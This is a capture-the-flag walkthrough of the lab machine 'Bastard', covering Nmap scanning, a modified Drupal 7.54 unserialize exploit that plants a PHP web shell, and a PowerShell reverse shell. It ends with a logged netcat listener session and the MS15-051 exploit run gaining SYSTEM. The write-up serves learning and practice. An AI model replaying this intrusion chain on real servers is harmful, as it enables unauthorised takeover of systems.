Bastard HTB — WalkThrough
This walkthrough will be of the Windows box Bastard, focusing on post exploit privilege escalation.
Initial Scans
Let’s kick it off with our go-to Nmap scan. Using -sC for default scripts and -sV to enumerate versions, and finally, -oA to output all formats.
# Nmap 7.80 scan initiated Sun Aug 16 20:40:16 2020 as: nmap -sC -sV -oA initial 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.043s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 16 20:41:23 2020 -- 1 IP address (1 host up) scanned in 67.34 seconds
Here we see that we have a Microsoft IIS httpd server listening on port 80 and MSRPC listening on both port 135 and 49154. Because web servers generally have a larger attack surface, let’s take a look at that first. In the scan, we see there is Drupal 7.X running and Nmap lets us know to check out CHANGELOG.txt as well as other interesting files.
Opening up the server in the browser we are presented with a Drupal login page:
The CHANGELOG.txt file that Nmap brought to our attention gives us plenty of information on the version of Drupal running:
Finding Exploits
From here we have an exact version, 7.54, and can start looking for exploits for this particular version.
The first search result for ‘Drupal 7.54 Exploits’ brings us to this Ambionics page for Drupal 7.X Service Module Unserialize() Remote Code Execution.
Searching in this page for our version ‘7.54’ shows that this exploit has run on our specific version.
I would recommend checking out the article to get a better understanding of how this exploit works. As explained in the above screenshot, Services allow you to create different endpoints with different resources. Thus, we do not know what the creator specified as the rest endpoint. We can find this by doing a dir scan, or by guessing possible endpoints in the browser. Guessing turned out to be the easiest way to find this endpoint, as it was just /rest/.
This endpoint will be important to know when we go to edit the exploit. We can find the exploit in searchsploit by searching for drupal.
This title is similar to the blog post by Ambionics that we looked at earlier. Copying the exploit to our working directory, and opening it with a text editor, we see that the same blog post is linked in the comments.
Modifying The Exploit
We need to modify the $url and the $endpoint_path variables to our target IP and rest endpoint, respectively. And modify the $file to use the shell_exec PHP command to execute the command as a shell and return the output as a string. Adding an upload function to our web shell is a good idea because we might need to send tools to our victim machine.
Now that this is all set up we can run the exploit against our target.
The exploit was successful and our file was written to the host. Let’s now go to that URL and attempt to execute a command.
Great! We now have remote code execution through the browser. Running systeminfo will tell us a little more about the machine.
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46 ££
System Boot Time: 23/8/2020, 7:02:03 §£
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.582 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.604 MB
Virtual Memory: In Use: 491 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9We see that we are running Microsoft Windows Server 2008 R2 x64 with no apparent hotfixes.
It would be helpful if we could get a reverse shell to connect back to us, and there are a few ways of doing that. We could find a Windows 64-Bit version of Netcat and upload that to our host and connect back that way, or we could use a PowerShell script to invoke a reverse PowerShell back to our machine.
Since we are going to be running a few Windows privilege escalation scripts that use PowerShell, let’s use the Invoke-Powershell script for our reverse shell. This script comes with PowerShell Empire and can be found using the locate command. Once the script is found, copy it over to our working directory and open it up in a text editor.
In the example, we need to copy this highlighted command to the last line in the file. In vi highlight the text then use the y command to copy and SHIFT+g to go to the last line. Then push p to paste the text after the cursor. Edit the IP to our IP and chosen port.
Save and quit using :wq and host the directory using pythons SimpleHTTPServer with the following command
python -m SimpleHTTPServerNow we can use our web shell to invoke the PowerShell script and send us back a reverse shell.
Enumeration Through the User Shell
Now that we have a shell that is easier to work with, we can start privilege escalation enumeration using some PowerShell scripts. I like to start with Sherlock.ps1 script.
Once the script is located and copied to our working directory we can edit the script to have the command Find-AllVulns run by inserting that at the end of the script.
Save and quit with :wq and, once again, host the directory with a python SimpleHTTPServer.
Now we can execute the script with the same PowerShell one-liner that we used for the Invoke-PowershellTcp.ps1 script.
We find two possible vulnerabilities in this scan.
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears VulnerableTitle : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
I could not find a version of the MS10–092 exploit that did not use Metasploit, so we are going to use the MS15–051 exploit which can be found by a simple google search.
We can choose the zip file and download it. All we need is the 64-bit version, so copy that to your working directory and host it with the python SimpleHTTPServer.
Now we can use the fupload function we put in our web shell to upload the exploit to the host. Then using nc64.exe we can get a remote shell to run the exploit and get system privileges.
kali@kali:~$ nc -nlvp 8080
listening on [any] 8080 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.10.9] 49186
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\inetpub\drupal-7.54>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAADirectory of C:\inetpub\drupal-7.5424/08/2020 02:31 �� <DIR> .
24/08/2020 02:31 �� <DIR> ..
19/03/2017 01:42 �� 317 .editorconfig
19/03/2017 01:42 �� 174 .gitignore
19/03/2017 01:42 �� 5.969 .htaccess
19/03/2017 01:42 �� 6.604 authorize.php
19/03/2017 01:42 �� 110.781 CHANGELOG.txt
19/03/2017 01:42 �� 1.481 COPYRIGHT.txt
19/03/2017 01:42 �� 720 cron.php
19/03/2017 01:43 �� <DIR> includes
19/03/2017 01:42 �� 529 index.php
19/03/2017 01:42 �� 1.717 INSTALL.mysql.txt
19/03/2017 01:42 �� 1.874 INSTALL.pgsql.txt
19/03/2017 01:42 �� 703 install.php
19/03/2017 01:42 �� 1.298 INSTALL.sqlite.txt
19/03/2017 01:42 �� 17.995 INSTALL.txt
19/03/2017 01:42 �� 18.092 LICENSE.txt
19/03/2017 01:42 �� 8.710 MAINTAINERS.txt
19/03/2017 01:43 �� <DIR> misc
19/03/2017 01:43 �� <DIR> modules
24/08/2020 02:31 �� 55.296 ms15-051x64.exe
24/08/2020 01:16 �� 43.696 nc64.exe
19/03/2017 01:43 �� <DIR> profiles
19/03/2017 01:42 �� 5.382 README.txt
19/03/2017 01:42 �� 2.189 robots.txt
24/08/2020 01:26 �� 272 s4u.php
19/03/2017 01:43 �� <DIR> scripts
24/08/2020 01:04 �� 266 shell.php
19/03/2017 01:43 �� <DIR> sites
19/03/2017 01:43 �� <DIR> themes
19/03/2017 01:42 �� 19.986 update.php
19/03/2017 01:42 �� 10.123 UPGRADE.txt
19/03/2017 01:42 �� 2.200 web.config
19/03/2017 01:42 �� 417 xmlrpc.php
25 File(s) 316.791 bytes
9 Dir(s) 30.807.846.912 bytes freeC:\inetpub\drupal-7.54>ms15-051x64.exe whoami
ms15-051x64.exe whoami
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 868 created.
==============================
nt authority\systemC:\inetpub\drupal-7.54>
We have system privileges! Thank you for your time in reading this writeup.
